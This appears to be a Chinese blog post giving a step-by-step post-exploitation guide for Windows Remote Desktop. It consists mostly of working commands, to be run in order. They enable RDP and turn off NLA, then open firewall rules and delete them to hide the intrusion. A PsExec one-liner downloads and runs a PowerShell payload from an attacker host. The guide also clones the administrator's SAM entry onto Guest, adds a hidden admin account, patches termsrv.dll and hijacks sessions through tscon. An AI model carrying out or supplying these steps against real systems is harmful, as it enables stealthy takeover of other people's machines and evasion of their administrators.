百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术文章 > 正文

Windows远程桌面的奇技淫巧

nanshan 2025-02-27 16:03 18 浏览 0 评论

前言

  • Windows远程桌面简介

远程桌面协议(RDP)是一个多通道(multi-channel)的协议,让使用者连上提供微软终端机服务的计算机(称为服务端或远程计算机)

  • 远程桌面的前置条件

在获取权限后,针对3389进行展开,先查询3389端口是否开启

netstat -ano | findstr 3389

发现没有开启(也有可能更改了端口),则可以通过注册表进行手动启动(需要管理员权限)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f      (开启)
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f      (关闭)

若执行失败,可能由于系统版本过旧(以下开启命令适用于Windows Server 2003之前系统)

wmic path Win32_TerminalServiceSetting where (__class = "Win32_TerminalServiceSetting") call SetAllowTSConnections 1(开启)
wmic path Win32_TerminalServiceSetting where (__class = "Win32_TerminalServiceSetting") call SetAllowTSConnections 0(关闭)

有些运维人员会勾选”仅允许使用网络级别的身份验证的远程桌面的计算机连接”选项,我们也可以通过注册表进行关闭,避免影响连接(开启同理0替换成1)

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

为了避免运维人员更改了RDP端口,可以确认下RDP端口

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /V PortNumber

正常若是3389端口为0xd3d(默认是十六进制表示)

在这里还需要保证防火墙等安全设备没有禁止且相互之间网络必须相通,这里防火墙设置只允许单独端口放通,减少运维人员的警觉(只允许3389端口放通)

netsh advfirewall firewall add rule name="RemoteDesktop" protocol=TCP dir=in localport=3389 action=allow

通过命令删除防火墙的通行策略(清理痕迹)

netsh advfirewall firewall delete rule name="RemoteDesktop"

【----帮助网安学习,需要网安学习资料关注我,私信回复“资料”免费获取----】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

克隆账户接管administrator桌面

  • 适用场景

在无法获取明文密码或者Hash等凭据,但是想接管实时的administrator桌面

  • 利用步骤(默认情况下需要system权限)

在administrator权限下进行切换(利用PsExec工具进行powershell无文件落地上线system权限)

shell "PsExec64.exe -accepteula -s powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.108.132:8080/a'))""

(-accepteula同意最终用户许可协议End User License Agreement,否则会弹窗无法运行)

查询用户的SID,方便选择克隆对象(常克隆Guest用户,系统自带不易察觉且默认的SID为501)

这里克隆administrator用户为Guest用户,将SID为500(对应十六进制为0x1f4)的管理员账号的相关信息导出为admin.reg

regedit /e admin.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4

将注册表文件下载到本地方便编辑(下载后默认在本地CS目录的下的download文件夹下,文件下载后需要重命名)

download admin.reg

将admin.reg文件的第三行HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4中的“1F4”修改为Guest的SID为1F5(十六进制),并保存为new.reg(方便区分)

将new.reg重新上传到受害机中

导入编辑好的new.reg文件

regedit /s new.reg

修改Guest密码便于远程登录,并及时清理两个reg文件

net user Guest Admin@123
del /F C:\Users\Administrator\Desktop\admin.reg C:\Users\Administrator\Desktop\new.reg

此时直接进行远程登录Guest账户,其实是administrator账户的系统,成功接管!

新建隐藏管理员+远程软件+会话劫持组合拳接管administrator桌面

  • 适用场景

在无法获取明文密码或者Hash等凭据,但是想接管实时的administrator桌面

  • 利用步骤

添加新隐藏用户

net user yuzi$ Admin@123 /add

将新隐藏用户添加到管理员组

net localgroup administrators yuzi$ /add

此时直接进行远程登录隐藏账户,进行图形化操作

若遇到对方已有用户在线,可能会出现以下界面(Windows sever版本默认支持多用户同时在线,Windows其他版本不支持)

此时为了做到更加隐蔽的进行登录(强迫登录会使对方会话掉线),可以修改termsrv.dll文件实现,操作前要将所有权转移给本地管理员,向本地管理员组授予对termsrv.dll文件的“完全控制”权限(若是通过powershell无文件远控的形式执行如下命令可能会出现问题,则需要在可执行木马的远控场景执行命令)

takeown /F c:\Windows\System32\termsrv.dll /A
icacls c:\Windows\System32\termsrv.dll /grant Administrators:F

修改系统文件可能会导致系统不稳定,确保有原始termsrv.dll文件的备份

copy c:\Windows\System32\termsrv.dll termsrv.dll_backup

接下来将对方的c:\Windows\System32\termsrv.dll文件下载至本地

download c:\Windows\System32\termsrv.dll

在编辑dll前需要确认当前系统的版本号,查看Windows的版本号

powershell Get-ComputerInfo -Property WindowsVersion, OsName

通过十六进制文本编辑器进行编辑termsrv.dll文件,按照不同的Windows的版本查找对应的字符串标识,替换为B8 00 01 00 00 89 81 38 06 00 00 90

修改完成后上传至对方,进行强制替换系统自带的termsrv.dll,(替换前需要先停止远程服务,以免发生冲突,替换后再重新启用远程服务)

net stop TermService /y
copy /y C:\Users\Administrator\Desktop\termsrv.dll c:\windows\system32\termsrv.dll
net start TermService 

重新进行3389远程连接,发现已经可以直接登录到新建隐藏管理员桌面,不再出现提示页面

借助Windows的特性,直接在新建隐藏管理员桌面安装轻量级的远控桌面软件并运行(这里以GotoHTTP为例)

在攻击机本地进行GotoHTTP远程桌面时候,发现已经成功接管了administrator的实时桌面(由于GotoHTTP是以管理员身份运行的故显示的administrator桌面)

若运气不好,发现利用GotoHTTP远程后在锁定页面,此时还可以配合会话劫持进行接管administrator实时桌面

接下来进行劫持(劫持administrator的会话),查询可劫持的会话

quser

以管理员权限运行cmd,创建服务(用于会话劫持的权限需要system,恰好Windows的服务是以system权限运行,其中的1为需要劫持的ID值)

sc create rdp binpath= "cmd.exe /k tscon 1 /dest:console"


启动并且删除服务后,发现此时的GotoHTTP页面已经成功进入解锁状态的桌面

sc start rdp & sc delete rdp & exit 

远程结束后进行删除隐藏用户(清理痕迹,这类隐藏用户容易发现)

net user yuzi$ /delete

相关推荐

Linux 中如何提取压缩文件 ?(linux怎么解压到当前文件夹)

Linux是一种流行的开源操作系统,它提供了许多工具来管理、压缩和解压缩文件。压缩文件有助于节省存储空间,使数据传输更快。本指南将向您展示如何在Linux中提取不同类型的压缩文件。1.Unpa...

在 WSL 中体验 Unix 哲学:从发消息到加密传输文件

Unix哲学强调小而简单的工具,利用它们组合起来完成复杂的任务。WindowsSubsystemforLinux(WSL)为我们提供了一个可以在Windows上运行Linux工具的...

还在用数据线?这样传文件简直不要太方便!支持多设备互传!

这是一款局域网文件传输工具,它支持windows端、安卓端、苹果端、和linux端的设备在同一局域网下进行文件互传,省去了数据线连接的麻烦。工具我已经为大家打包好了,有兴趣的朋友可以在这里获取。大家好...

Linux远程文件传输神器:rz / sz 全指南(含实操示例)

原文链接:「链接」在日常使用Linux服务器时,是否常常因为文件传输问题而苦恼?复制粘贴效率低,FTP配置复杂?今天推荐一套简单高效的终端工具组合:rz和sz。这两个命令搭配使用,能在本地与...

机房搬迁后域控服务器失联?原因令人乍舌,看我如何快速修复

一、问题背景:一场搬迁后引发的连锁故障为某客户的主域服务器升级内存,因为我们知道有备域,所以也就没多想,直接关闭了主域服务器,可是刚打开机箱盖,就有用户反馈,不能上网了,紧接着,各部门都来反馈断网,难...

办公室SSH服务器远程访问,重启自动建立通道

背景可以通过一台外网服务器建立来自Internet上的客户与办公室SSH服务的连接。Ubuntu下可以使用如下命令。autossh-M0-o"ServerAliveInterval3...

Windows Autopatch热修复功能上线:企业PC Win11更新无需重启

IT之家6月25日消息,今年5月,微软为Windows11设备发布了首个热修复更新,并在同一时期为WindowsAutopatch添加了热修复功能。Autopatch是微软的...

路由器设置优化指南,小白也能轻松上手!

【ZOL中关村在线原创技巧应用】在数字化时代,网络已成为生活必需品,追剧、游戏、办公、学习都离不开稳定高速的网络。但很多人面对新路由器,不知道如何设置才能上网。本文将用通俗易懂的方式,一步步教你完成设...

如何防止DDoS攻击导致的服务中断(如何防止服务器被ddos)

防止DDoS(分布式拒绝服务)攻击导致的服务中断需要结合多种技术和策略。DDoS是通过大量恶意流量压垮服务器或网络资源,使正常用户无法访问服务。以下是针对DDoS攻击的预防措施和应对策略,帮...

零配置网络与.local 后缀(零配置失败)

在小型的家庭网络或办公室环境中,你可能经常遇到这样的场景:想要访问网络中的一台设备,比如家里的网络打印机、智能音箱,或者一个共享文件服务器,但你不知道它的具体IP地址。每次都要去路由器后台查看或者...

蓝牙无法搜索到设备?全面排查与解决指南

蓝牙作为主流无线连接技术,偶尔会出现“无法搜索到设备”的问题,这类故障多由设备状态、设置错误或兼容性问题引发。以下是一套系统化的排查方案,从基础检查到深度修复,帮你快速恢复蓝牙连接功能。一、快速检...

电脑网络出现黄色感叹号?一文教你彻底解决无网络连接问题

当电脑右下角的网络图标突然亮起黄色感叹号,显示"无Internet连接"时,这种突如其来的断网状况往往让人措手不及。无论是正在进行的视频会议、即将提交的工作文件,还是在线游戏的关键时刻...

手机信号恢复最简单的方法(手机信号怎么修)

重启手机或开关飞行模式信号恢复最简单的方法是重启手机或开关飞行模式,这一操作能快速刷新网络连接,解决80%以上的临时性信号丢失问题。快速恢复信号的简易步骤开关飞行模式。下拉通知栏,开启飞行模式等待10...

《Windows 学习:100 条命令大全》内容总结

一、文件与目录管理1.基础操作dir:用于列出当前目录下的文件和子目录。在命令提示符中输入dir,即可显示当前目录的内容,如文件名称、大小、修改日期等信息。若想查看隐藏文件,可使用dir/a命令。...

路由器亮红灯:网络“健康警报”的全面解读与自救指南

当你发现路由器的指示灯突然泛起红光,往往代表着你的网络连接已出现严重问题。面对这一情况,不必惊慌。本文将带你一步步拆解红灯背后的常见原因,并提供系统性的解决方案,让你从被动等待转为主动修复。红灯亮起的...

取消回复欢迎 发表评论: